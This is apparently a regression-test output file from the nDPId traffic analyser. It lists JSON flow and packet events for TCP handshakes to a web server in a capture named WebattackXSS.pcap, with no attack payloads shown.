+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4356,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":3,"flow_last_seen":1499347489409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347489409,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06N9AAD4G3PisEAABwKgKMuGKAFByXg2zaFlqRoAQAOUo9AAAAQEICgE65WwD5Lbh"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347490659,"flow_last_seen":1499347490659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347490659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1499347490659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347490659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8roVAAD4GF0usEAABwKgKMuGYAFBT40ghAAAAAKACchD5NwAAAgQFtAQCCAoBOuakAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4364,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":2,"flow_last_seen":1499347490659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347490659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4ZjtXjkmU+NIIqAScSAXkwAAAgQFtAQCCAoD5LgaATrmpAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":3,"flow_last_seen":1499347490660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347490660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0roZAAD4GF1KsEAABwKgKMuGYAFBT40gi7V45J4AQAOW2mQAAAQEICgE65qUD5Lga"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347493167,"flow_last_seen":1499347493167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347493167,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1499347493167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347493167,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VdJAAD4Gb\/6sEAABwKgKMuGyAFCUXbzFAAAAAKACchBBjAAAAgQFtAQCCAoBOukXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":2,"flow_last_seen":1499347493167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347493167,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4bJdzKzTlF28xqAScSB5WQAAAgQFtAQCCAoD5LqNATrpFwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4386,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":3,"flow_last_seen":1499347493168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347493168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VdNAAD4GcAWsEAABwKgKMuGyAFCUXbzGXcys1IAQAOUYYAAAAQEICgE66RgD5LqN"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347494446,"flow_last_seen":1499347494446,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347494446,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1499347494446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347494446,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8G1FAAD4Gqn+sEAABwKgKMuHAAFAmKfEGAAAAAKACchB6MQAAAgQFtAQCCAoBOupXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":2,"flow_last_seen":1499347494446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347494446,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4cATAV39JinxB6AScSBKYAAAAgQFtAQCCAoD5LvNATrqVwEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":3,"flow_last_seen":1499347494447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347494447,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0G1JAAD4GqoasEAABwKgKMuHAAFAmKfEHEwFd\/oAQAOXpZwAAAQEICgE66lcD5LvN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347495714,"flow_last_seen":1499347495714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1499347495714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347495714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ai5AAD4GW6KsEAABwKgKMuHOAFCuqYG6AAAAAKACchBfsgAAAgQFtAQCCAoBOuuUAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4406,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":2,"flow_last_seen":1499347495714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347495714,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4c4n\/DE+rqmBu6AScSBGaAAAAgQFtAQCCAoD5L0KATrrlAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4407,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":3,"flow_last_seen":1499347495715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347495715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ai9AAD4GW6msEAABwKgKMuHOAFCuqYG7J\/wxP4AQAOXlbwAAAQEICgE665QD5L0K"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347498249,"flow_last_seen":1499347498249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347498249,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1499347498249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347498249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LPFAAD4GmN+sEAABwKgKMuHoAFBfF8L\/AAAAAKACchBrawAAAgQFtAQCCAoBOu4OAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":2,"flow_last_seen":1499347498249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347498249,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4ejKfeZhXxfDAKAScSD4AgAAAgQFtAQCCAoD5L+DATruDgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":3,"flow_last_seen":1499347498250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347498250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LPJAAD4GmOasEAABwKgKMuHoAFBfF8MAyn3mYoAQAOWXCgAAAQEICgE67g4D5L+D"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347499500,"flow_last_seen":1499347499500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347499500,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1499347499500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347499500,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82IhAAD4G7UesEAABwKgKMuH2AFAMLDfPAAAAAKACchBIQAAAAgQFtAQCCAoBOu9HAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4436,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":2,"flow_last_seen":1499347499500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347499500,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4fa1N28pDCw30KAScSBgHQAAAgQFtAQCCAoD5MC8ATrvRwEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":3,"flow_last_seen":1499347499501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347499501,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02IlAAD4G7U6sEAABwKgKMuH2AFAMLDfQtTdvKoAQAOX\/JAAAAQEICgE670cD5MC8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347500770,"flow_last_seen":1499347500770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347500770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1499347500770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347500770,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YZZAAD4GZDqsEAABwKgKMuIEAFAvvZESAAAAAKACchDKIAAAAgQFtAQCCAoBOvCEAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":2,"flow_last_seen":1499347500770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347500770,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4gSIcKZ3L72RE6AScSDWOAAAAgQFtAQCCAoD5MH6ATrwhAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":3,"flow_last_seen":1499347500770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347500770,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YZdAAD4GZEGsEAABwKgKMuIEAFAvvZETiHCmeIAQAOV1QAAAAQEICgE68IQD5MH6"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347503273,"flow_last_seen":1499347503273,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347503273,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1499347503273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347503273,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JtZAAD4GnvqsEAABwKgKMuIeAFAcz9QgAAAAAKACchCXdAAAAgQFtAQCCAoBOvL2AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":2,"flow_last_seen":1499347503273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347503273,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4h43pRReHM\/UIaAScSCEAAAAAgQFtAQCCAoD5MRrATry9gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4468,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":3,"flow_last_seen":1499347503274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347503274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JtdAAD4GnwGsEAABwKgKMuIeAFAcz9QhN6UUX4AQAOUjCAAAAQEICgE68vYD5MRr"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347504529,"flow_last_seen":1499347504529,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347504529,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1499347504529,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347504529,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MbJAAD4GlB6sEAABwKgKMuIsAFBuJcWCAAAAAKACchBTdAAAAgQFtAQCCAoBOvQwAAAAAAEDAwc="} 